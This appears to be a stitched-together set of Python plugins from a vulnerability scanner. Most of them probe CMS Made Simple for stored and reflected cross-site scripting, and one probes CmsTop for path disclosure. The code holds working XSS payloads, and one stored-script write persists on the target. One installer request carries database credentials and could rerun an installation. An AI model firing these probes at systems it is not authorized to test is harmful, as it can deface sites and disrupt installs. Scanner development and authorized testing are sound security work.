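    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # Log the failing URL together with the plugin name.
        _l = ClassCongregation.ErrorLog().Write(url, _)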
def medusa(Url, RandomAgent, UnixTimestamp):
    """CMS Made Simple stored cross-site-scripting check (admin/siteprefs.php).

    POSTs a site-preferences form whose ``metadata`` field is
    ``<script>alert("cscanhyhm2n")</script>`` and reports the target when a
    200 response contains the ``cscanhyhm2n`` marker.

    Args:
        Url: target as supplied by the caller; scheme, host and port are split
            by ``ClassCongregation.UrlProcessing``.
        RandomAgent: User-Agent string to send.
        UnixTimestamp: passed through to ``ClassCongregation.VulnerabilityDetails``.

    Returns:
        None. A hit is recorded through ``VulnerabilityDetails`` and
        ``WriteFile``; any exception is routed to ``ErrorHandling``/``ErrorLog``.

    Security notes:
        - If the target accepts the request (``editsiteprefs=true``), the
          script tag is stored in the site metadata and served to every
          visitor until removed — clean up after testing.
        - ``__c=3da8342831010e889e2`` is a fixed session/CSRF value from a lab
          session; the form is only accepted where it matches the target's
          current value (NOTE(review): likely needs to be obtained per target).
        - TLS verification is disabled (``verify=False``).
    """
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        target = scheme + "://" + url + ":" + str(port) + "/cmsms2.2.7/admin/siteprefs.php"
        form = '''__c=3da8342831010e889e2&active_tab=general&editsiteprefs=true&submit=Submit&sitename=lnyas's+cmsms&frontendlang=&frontendwysiwyg=-1&metadata=<script>alert("cscanhyhm2n")</script>&logintheme=OneEleven&defaultdateformat=1&thumbnail_width=96&thumbnail_height=96&search_module=Search'''
        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        with requests.session() as session:
            response = session.post(target, data=form, headers=request_headers,
                                    timeout=6, verify=False)
        body = response.text
        hit = response.status_code == 200 and 'cscanhyhm2n' in body
        if hit:
            Medusa = "{}存在CMSMS存储型跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, target, body)
            details = VulnerabilityInfo(Medusa)
            # Record the finding (url plus the scan data).
            ClassCongregation.VulnerabilityDetails(details.info, url, UnixTimestamp).Write()
            # Persist to file; url is the per-target file name, Medusa the body.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as exc:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(exc, plugin)
        # Log the failing URL together with the plugin name.
        ClassCongregation.ErrorLog().Write(url, plugin)
def medusa(Url, RandomAgent, ProxyIp):
    """CMS Made Simple installer reflected cross-site-scripting check.

    POSTs ``default_cms_lang='>">;<body/onload=alert(cscan-hyhmnn)>`` to
    ``/k/cms/cmsmadesimple/install/index.php?sessiontest=1`` and reports the
    target when a 200 response contains the ``cscan-hyhmnn`` marker.

    Args:
        Url: target as supplied by the caller; scheme, host and port are split
            by ``ClassCongregation.UrlProcessing``.
        RandomAgent: User-Agent string to send.
        ProxyIp: accepted for signature compatibility; this check does not
            use it (no proxy is passed to the request).

    Returns:
        None. A hit is rated Low through ``VulnerabilityDetails`` and written
        with ``WriteFile``; any exception is written to ``ErrorLog``.

    Security notes:
        - The path includes a fixed ``/k/cms/cmsmadesimple`` prefix taken from
          a lab deployment; real targets will usually expose the installer
          elsewhere, if at all.
        - TLS verification is disabled (``verify=False``).
    """
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        target = scheme + "://" + url + ":" + str(port) + "/k/cms/cmsmadesimple/install/index.php?sessiontest=1"
        form = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert(cscan-hyhmnn)%3e&submit=Submit'''
        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        with requests.session() as session:
            response = session.post(target, data=form, headers=request_headers,
                                    timeout=6, verify=False)
        body = response.text
        if response.status_code != 200 or 'cscan-hyhmnn' not in body:
            return
        Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
            url, target, body)
        details = VulnerabilityInfo(Medusa)
        record = ClassCongregation.VulnerabilityDetails(details.info)
        # Severity levels: serious, High, Intermediate, Low.
        record.Low()
        # Persist to file; url is the per-target file name, Medusa the body.
        ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception:
        plugin = VulnerabilityInfo('').info.get('algroup')
        # Log the failing URL together with the plugin name.
        ClassCongregation.ErrorLog().Write(url, plugin)
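def medusa(Url, RandomAgent, ProxyIp):
    """CmsTop template-edit path-disclosure check.

    GETs ``apps/system/view/template/edit.php`` (with and without a
    ``/cmstop`` prefix) and reports the target when the response contains a
    PHP error trailer of the form ``in <b>/path/file.php</b> on line <b>N</b>``.

    Args:
        Url: target as supplied by the caller; scheme, host and port are split
            by ``ClassCongregation.UrlProcessing``.
        RandomAgent: User-Agent string to send.
        ProxyIp: accepted for signature compatibility; this check does not
            use it (no proxy is passed to the request).

    Returns:
        None. Each hit is rated High through ``VulnerabilityDetails`` and
        written with ``WriteFile``; any exception is written to ``ErrorLog``.

    Security notes:
        - Passive in effect: the request only provokes an error page.
        - TLS verification is disabled (``verify=False``).
    """
    import re

    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    # PHP's HTML error trailer. The original passed this pattern to str.find,
    # which searches for the literal characters "([^<]+)" and "(\d+)" and so
    # could never match; it has to be evaluated as a regular expression.
    error_trailer = re.compile(r' in <b>([^<]+)</b> on line <b>(\d+)</b>')
    Payloads = [
        "/cmstop/apps/system/view/template/edit.php",
        "/apps/system/view/template/edit.php"
    ]
    headers = {
        'User-Agent': RandomAgent,
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
    }
    for payload in Payloads:
        try:
            payload_url = scheme + "://" + url + ":" + str(port) + payload
            with requests.session() as s:
                resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
            con = resp.text
            if error_trailer.search(con) is not None:
                Medusa = "{}存在CmsTop文件路径漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                    url, payload_url, con)
                _t = VulnerabilityInfo(Medusa)
                web = ClassCongregation.VulnerabilityDetails(_t.info)
                # Severity levels: serious, High, Intermediate, Low.
                web.High()
                # Persist to file; url is the per-target file name, Medusa the body.
                ClassCongregation.WriteFile().result(str(url), str(Medusa))
        except Exception:
            _ = VulnerabilityInfo('').info.get('algroup')
            # Log the failing URL together with the plugin name.
            _l = ClassCongregation.ErrorLog().Write(url, _)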
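def San(Pool, Module, ActiveScanId, Uid, Headers, Url):
    """Dispatch an active scan of ``Url`` to one POC module or to all of them.

    The URL is normalised once here — an explicit port is filled in from the
    scheme — so individual plugins do not have to repeat that work (a plugin
    that needs a fixed port can still rewrite it afterwards). Each module is
    looked up in the module-level ``MedusaModuleList`` and handed ``Pool`` so
    the POCs run in the shared process pool, which makes batch scans much
    faster; ``Pool.Start(ProcessNumber)`` then starts the pool.

    Args:
        Pool: the multiprocess pool the modules enqueue their work into.
        Module: module name to run, or None to run every module.
        ActiveScanId, Uid, Headers: passed through to each module unchanged.
        Url: target URL; normalised before dispatch.

    Globals:
        ``MedusaModuleList``, ``proxies`` and ``ProcessNumber`` are read from
        module scope.

    Exits:
        Calls ``os._exit(1)`` after printing a message when ``Module`` is not a
        known module name. The original used a bare ``except:`` around the
        dispatch and exited with status 0, which reported every failure inside
        the module call as "wrong module name" and signalled success to the
        shell; only the lookup failure is handled here, and other exceptions
        propagate with their real traceback.
    """
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    Url = scheme + "://" + url + ":" + str(port)  # normalised URL
    if Module is None:
        print("\033[32m[ + ] Scanning across modules:\033[0m" + "\033[35m AllMod \033[0m")
        for run_module in MedusaModuleList.values():
            run_module(Pool, ActiveScanId=ActiveScanId, Uid=Uid, Headers=Headers,
                       Url=Url, Proxies=proxies)
    else:
        try:
            run_module = MedusaModuleList[Module]
        except KeyError:
            # Unknown module name: tell the user and stop the whole process.
            print("\033[31m[ ! ] Please enter the correct scan module name\033[0m")
            os._exit(1)
        run_module(Pool, ActiveScanId=ActiveScanId, Uid=Uid, Headers=Headers,
                   Url=Url, Proxies=proxies)
    Pool.Start(ProcessNumber)  # start the worker processes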
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """CMS Made Simple installer cross-site-scripting check (``docroot`` field).

    POSTs an installer form whose ``docroot`` value is
    ``$("<img/src='x'/onerror=alert(cscan-hyhmnn)>")`` to
    ``/k/cms/cmsmadesimple/install/index.php`` and reports the target when a
    200 response echoes that value inside an ``<a href="…">`` attribute.

    Args:
        Url: target as supplied by the caller; scheme, host and port are split
            by ``ClassCongregation.UrlProcessing``.
        Headers: request headers to send as given.
        proxies: optional proxy specification, normalised by
            ``ClassCongregation.Proxies``.
        **kwargs: passed through to ``ClassCongregation.VulnerabilityDetails``.

    Returns:
        None. A hit is recorded through ``VulnerabilityDetails`` and
        ``WriteFile``; any exception is routed to ``ErrorHandling``/``ErrorLog``.

    Security notes:
        - The form carries real installer parameters: database credentials
          (``username=root&password=superpass``), an admin password,
          ``createtables=1`` and ``page=7``. If the installer is live on the
          target, this request may advance or (re)run the installation with
          these values — a destructive side effect well beyond an XSS probe.
          NOTE(review): confirm the wizard cannot be driven by this request
          before using it outside a lab.
        - The path includes a fixed ``/k/cms/cmsmadesimple`` prefix taken from
          a lab deployment.
        - TLS verification is disabled (``verify=False``).
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        target = scheme + "://" + url + ":" + str(port) + "/k/cms/cmsmadesimple/install/index.php"
        form = '''docroot=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(cscan-hyhmnn)%3e")&docpath=%2Fhome%2Fk%2Fpublic_html%2Fcms%2Fcmsmadesimple&querystr=page&frontendlang=en_US&umask=022&host=localhost&dbms=mysqli&database=cms&username=root&password=superpass&db_port=0&timezone=Europe%2FBerlin&prefix=cms_&createtables=1&email_accountinfo=0&adminemail=admin%40here.com&adminusername=admin&adminpassword=password&page=7&default_cms_lang=en_US'''
        response = requests.post(target, data=form, headers=Headers,
                                 proxies=proxies, timeout=6, verify=False)
        body = response.text
        marker = '''<a href="$("<img/src='x'/onerror=alert(cscan-hyhmnn)>'''
        if response.status_code != 200 or marker not in body:
            return
        Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
            url, target, body)
        details = VulnerabilityInfo(Medusa)
        # Record the finding (url plus the scan data).
        ClassCongregation.VulnerabilityDetails(details.info, url, **kwargs).Write()
        # Persist to file; url is the per-target file name, Medusa the body.
        ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as exc:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(exc, plugin)
        # Log plugin name, target and the exception.
        ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + plugin + " || Target Url:" + url, exc)